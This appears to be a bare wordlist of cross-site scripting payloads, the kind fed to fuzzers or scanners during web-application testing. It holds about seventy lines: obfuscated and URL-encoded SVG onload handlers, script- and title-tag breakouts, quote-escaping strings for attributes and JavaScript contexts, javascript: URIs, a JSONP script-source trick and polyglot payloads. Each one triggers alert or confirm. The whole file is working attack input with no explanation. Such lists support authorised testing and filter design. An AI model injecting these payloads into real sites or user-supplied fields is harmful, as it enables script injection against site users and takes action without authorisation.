%2522%253E%253CsVg%2FoNlOaD%3Dalert(1)%253E
%253Csvg/o%256Eload%253Dalert(1)%253E%3E
</sCrIpT><sCrIpT/%0A<k>%28confirm%29(1)</sCrIpT>//
</sCrIpT><sCrIpT/*%0A<k>%28confirm%29(1)</sCrIpT>//
<iMg%0A%2fsRc%0A%3D%2f%20%0A/**/oNcLiCk%0A%3D%28confirm%29(1)>//
<bOdY%0A////////%0A%00/**/oNlOaD%0A%20%3D%28confirm%29(1)>//
<iframe srcdoc=%26lt;svg/o%26%23x6Eload%26equals;alert%26lpar;1)%26gt;>
<javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>/*click me!#*/alert(1)
<sVg%0A////////%0A%00/%0A/**/oNlOaD%0A=(confirm)(1)>//
<svg/onload=location=/javas/.source%2B/cript:/.source%2B/ale/.source%2B/rt/.source%2Blocation.hash[1]%2B1%2Blocation.hash[2]>#()
<javascript: onmouseover=location=tagName%2bURL>click me!#%0Aalert(1)
<javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>/*click me!#*/alert(1)
<svg onload=`<script`-alert(1)>
<svg onload=top[8680439..toString(30)](1)>
<svg onload=javas%26%2399ript:alert(1)>
<script src=https://www.google.com/complete/search?client=chrome%26jsonp=alert(1);></script>
<input onfocus="alert(1)" autofocus>
</title><svg onload=alert(1)><title>
</NOSCRIPT><svg onload=alert(1)><NOSCRIPT>
testtest"autofocus onfocus=alert(1)//
testtest'autofocus onfocus=alert(1)//
testtest"autofocus onfocus="alert(1)
testtest'autofocus onfocus='alert(1)
testtest"><svg onload="alert(1)
testtest'><svg onload='alert(1)
testtest"><svg onload=alert(1)>
testtest'><svg onload=alert(1)>
testtest%2522%252F%253E%253Csvg%20onload%3Dalert(1)%253E
</SCRIPT>%0A<SCRIPT>alert(1)</SCRIPT>
</SCRIPT>%0A<svg onload=alert(1)>
"-alert(1)//
'-alert(1)//
"-alert(1)-"
'-alert(1)-'
";alert(1);"
';alert(1);'
";-alert(1);"
';-alert(1);'
";-alert(1);-"
';-alert(1);-'
";alert(1)//
';alert(1)//
\";alert(1);//
\';alert(1);//
\\";alert(1);//
\\';alert(1);// 
\";-alert(1);//
\';-alert(1);//
\\";-alert(1);//
\\';-alert(1);//
\";alert(1);//
\';alert(1);//
\";-alert(1);//
\';-alert(1);//
\";alert(1)//
\';alert(1)//
alert(1)
";alert(1); var foo="
';alert(1); var foo='
";}alert(1);function x(){//
';}alert(1);function x(){//
";}alert(1);-function x(){//
';}alert(1);-function x(){//
\"})))}catch(e){alert(1)}//'
alert(1)%26sol;%26sol;
'';!--"<XSS>=&{()}
'';!--"=&amp;{()}
'';!--"=&{()}
javascript:alert(1)
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1) )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1)//>\x3e
<"/*'/*</Title/</Script/--><svg/**/; OnlOad=(alert)(1)>